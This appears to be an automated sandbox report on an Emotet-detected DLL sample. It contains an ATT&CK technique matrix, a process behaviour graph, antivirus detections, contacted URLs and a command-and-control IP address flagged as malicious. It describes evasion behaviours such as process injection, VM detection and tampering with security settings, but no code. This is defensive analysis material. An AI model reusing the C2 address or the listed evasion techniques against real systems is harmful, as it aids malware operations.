                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      111
                      Process Injection
                      2
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium11
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API
                      Boot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      LSASS Memory151
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                      Ingress Tool Transfer
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)13
                      Virtualization/Sandbox Evasion
                      Security Account Manager13
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                      Process Injection
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Hidden Files and Directories
                      LSA Secrets1
                      Remote System Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Obfuscated Files or Information
                      Cached Domain Credentials2
                      File and Directory Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Regsvr32
                      DCSync34
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32
                      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      File Deletion
                      Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 626499 Sample: auExrOTnvB.dll Startdate: 14/05/2022 Architecture: WINDOWS Score: 92 43 Multi AV Scanner detection for domain / URL 2->43 45 Antivirus detection for URL or domain 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected Emotet 2->49 7 loaddll64.exe 1 2->7         started        9 svchost.exe 2->9         started        12 svchost.exe 2->12         started        14 10 other processes 2->14 process3 dnsIp4 17 regsvr32.exe 5 7->17         started        21 cmd.exe 1 7->21         started        23 rundll32.exe 2 7->23         started        25 rundll32.exe 7->25         started        53 Changes security center settings (notifications, updates, antivirus, firewall) 9->53 27 MpCmdRun.exe 1 9->27         started        55 Query firmware table information (likely to detect VMs) 12->55 41 127.0.0.1 unknown unknown 14->41 signatures5 process6 dnsIp7 37 192.168.2.1 unknown unknown 17->37 51 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->51 29 regsvr32.exe 17->29         started        33 rundll32.exe 2 21->33         started        35 conhost.exe 27->35         started        signatures8 process9 dnsIp10 39 23.239.0.12, 443, 49747 LINODE-APLinodeLLCUS United States 29->39 57 System process connects to network (likely due to code injection or exploit) 29->57 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 33->59 signatures11

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      auExrOTnvB.dll32%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLinkDownload
                      4.2.rundll32.exe.26ed90d0000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      3.2.rundll32.exe.2ace68d0000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      2.2.regsvr32.exe.d00000.0.unpack100%AviraHEUR/AGEN.1215493Download File
                      6.2.regsvr32.exe.21f0000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://23.239.0.12/ges100%Avira URL Cloudmalware
                      https://www.pango.co/privacy0%URL Reputationsafe
                      https://www.tiktok.com/legal/report0%URL Reputationsafe
                      https://23.239.0.12/.10%VirustotalBrowse
                      https://23.239.0.12/.100%Avira URL Cloudmalware
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      https://23.239.0.12/0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      https://23.239.0.12/true
                      • URL Reputation: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000C.00000002.329979886.0000026D25A3E000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000C.00000002.329984828.0000026D25A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000C.00000002.329999413.0000026D25A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329694144.0000026D25A4C000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000C.00000002.329947433.0000026D25A13000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000C.00000002.329989904.0000026D25A43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329728447.0000026D25A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000C.00000003.329694144.0000026D25A4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329962184.0000026D25A29000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=svchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000C.00000002.329989904.0000026D25A43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329728447.0000026D25A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://23.239.0.12/gesregsvr32.exe, 00000006.00000002.663020572.0000000000883000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.354383215.0000000000883000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://www.hotspotshield.com/terms/svchost.exe, 0000001E.00000003.548747158.000002740D21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548579382.000002740CDA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.549970585.000002740D202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548498522.000002740CD98000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.550146620.000002740CD87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.549907054.000002740D21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548483451.000002740CD87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://www.pango.co/privacysvchost.exe, 0000001E.00000003.548747158.000002740D21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548579382.000002740CDA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.549970585.000002740D202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548498522.000002740CD98000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.550146620.000002740CD87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.549907054.000002740D21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548483451.000002740CD87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.tiktok.com/legal/reportsvchost.exe, 0000001E.00000003.562074619.000002740CD87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://ecn.dev.virtualearth.net/mapcontrol/roadshield.ashx?bucket=svchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.bingmapsportal.comsvchost.exe, 0000000C.00000002.329947433.0000026D25A13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000C.00000002.329962184.0000026D25A29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329979886.0000026D25A3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://23.239.0.12/.regsvr32.exe, 00000006.00000002.663020572.0000000000883000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.354383215.0000000000883000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • 10%, Virustotal, Browse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000001E.00000003.558333053.000002740CD89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329723643.0000026D25A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000C.00000003.329604876.0000026D25A69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330037413.0000026D25A6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000C.00000002.329979886.0000026D25A3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000C.00000002.329962184.0000026D25A29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329723643.0000026D25A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://dev.virtualearth.net/REST/v1/Transit/Stops/svchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 0000000C.00000003.329739644.0000026D25A2E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329969024.0000026D25A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.ver)svchost.exe, 00000010.00000002.608997349.000001D672600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        low
                                                                        https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000C.00000003.329717997.0000026D25A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329994704.0000026D25A48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001E.00000003.562025764.000002740CDAE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.562096716.000002740D202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.562062118.000002740CDAE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.562074619.000002740CD87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.562083780.000002740CD98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000C.00000002.329979886.0000026D25A3E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329947433.0000026D25A13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://%s.xboxlive.comsvchost.exe, 0000000A.00000002.663304922.000001C82CE29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            low
                                                                            https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://support.hotspotshield.com/svchost.exe, 0000001E.00000003.548747158.000002740D21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548579382.000002740CDA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.549970585.000002740D202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548498522.000002740CD98000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.550146620.000002740CD87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.549907054.000002740D21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548483451.000002740CD87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000C.00000003.329717997.0000026D25A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329994704.0000026D25A48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000001E.00000003.558333053.000002740CD89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000C.00000002.329999413.0000026D25A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329694144.0000026D25A4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://dynamic.tsvchost.exe, 0000000C.00000003.329723643.0000026D25A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://disneyplus.com/legal.svchost.exe, 0000001E.00000003.558333053.000002740CD89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329739644.0000026D25A2E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329969024.0000026D25A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000C.00000003.329717997.0000026D25A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329994704.0000026D25A48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://activity.windows.comsvchost.exe, 0000000A.00000002.663304922.000001C82CE29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://help.disneyplus.com.svchost.exe, 0000001E.00000003.558333053.000002740CD89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://%s.dnet.xboxlive.comsvchost.exe, 0000000A.00000002.663304922.000001C82CE29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  low
                                                                                                  https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000C.00000002.329999413.0000026D25A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329694144.0000026D25A4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000C.00000003.329694144.0000026D25A4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      23.239.0.12
                                                                                                      unknownUnited States
                                                                                                      63949LINODE-APLinodeLLCUStrue
                                                                                                      IP
                                                                                                      192.168.2.1
                                                                                                      127.0.0.1
                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                      Analysis ID:626499
                                                                                                      Start date and time: 14/05/202205:16:032022-05-14 05:16:03 +02:00
                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                      Overall analysis duration:0h 8m 57s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Sample file name:auExrOTnvB.dll
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                      Run name:Run with higher sleep bypass
                                                                                                      Number of analysed new started processes analysed:35
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • HDC enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Detection:MAL
                                                                                                      Classification:mal92.troj.evad.winDLL@28/6@0/3
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HDC Information:Failed
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 99%
                                                                                                      • Number of executed functions: 48
                                                                                                      • Number of non-executed functions: 215
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .dll
                                                                                                      • Adjust boot time
                                                                                                      • Enable AMSI
                                                                                                      • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, UsoClient.exe, wuapihost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.4.86, 51.104.136.2, 20.223.24.244
                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, settings-prod-neu-2.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, atm-settingsfe-prod-geo.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      TimeTypeDescription
                                                                                                      05:17:42API Interceptor1x Sleep call for process: svchost.exe modified
                                                                                                      05:18:37API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      23.239.0.12S0Uj3iEhau.dllGet hashmaliciousBrowse
                                                                                                        Ru97gvh8ir.dllGet hashmaliciousBrowse
                                                                                                          1V4gPPcQvB.dllGet hashmaliciousBrowse
                                                                                                            1Klocu2k7B.dllGet hashmaliciousBrowse
                                                                                                              vur7t4SumQ.dllGet hashmaliciousBrowse
                                                                                                                auExrOTnvB.dllGet hashmaliciousBrowse
                                                                                                                  PvaOeKqrBs.dllGet hashmaliciousBrowse
                                                                                                                    1V4gPPcQvB.dllGet hashmaliciousBrowse
                                                                                                                      Plt3z2W7KQ.dllGet hashmaliciousBrowse
                                                                                                                        2V7zjcga5L.dllGet hashmaliciousBrowse
                                                                                                                          vur7t4SumQ.dllGet hashmaliciousBrowse
                                                                                                                            3j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                                                                              wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                                                                                                                r0hiaXHscs.dllGet hashmaliciousBrowse
                                                                                                                                  TSvDnT6fkE.dllGet hashmaliciousBrowse
                                                                                                                                    Plt3z2W7KQ.dllGet hashmaliciousBrowse
                                                                                                                                      2V7zjcga5L.dllGet hashmaliciousBrowse
                                                                                                                                        RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                                                                                          yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                                                                                            3j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                                                                                              No context
                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              LINODE-APLinodeLLCUSS0Uj3iEhau.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              Ru97gvh8ir.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              1V4gPPcQvB.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              1Klocu2k7B.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              vur7t4SumQ.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              auExrOTnvB.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              PvaOeKqrBs.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              1V4gPPcQvB.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              Plt3z2W7KQ.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              2V7zjcga5L.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              vur7t4SumQ.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              3j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              r0hiaXHscs.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              TSvDnT6fkE.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              Plt3z2W7KQ.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              2V7zjcga5L.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              3j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              51c64c77e60f3980eea90869b68c58a8S0Uj3iEhau.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              Ru97gvh8ir.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              1V4gPPcQvB.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              1Klocu2k7B.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              vur7t4SumQ.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              auExrOTnvB.dllGet hashmaliciousBrowse
                                                                                                                                              • 23.239.0.12
                                                                                                                                              PvaOeKqrBs.dllGet hashmaliciousBrowse
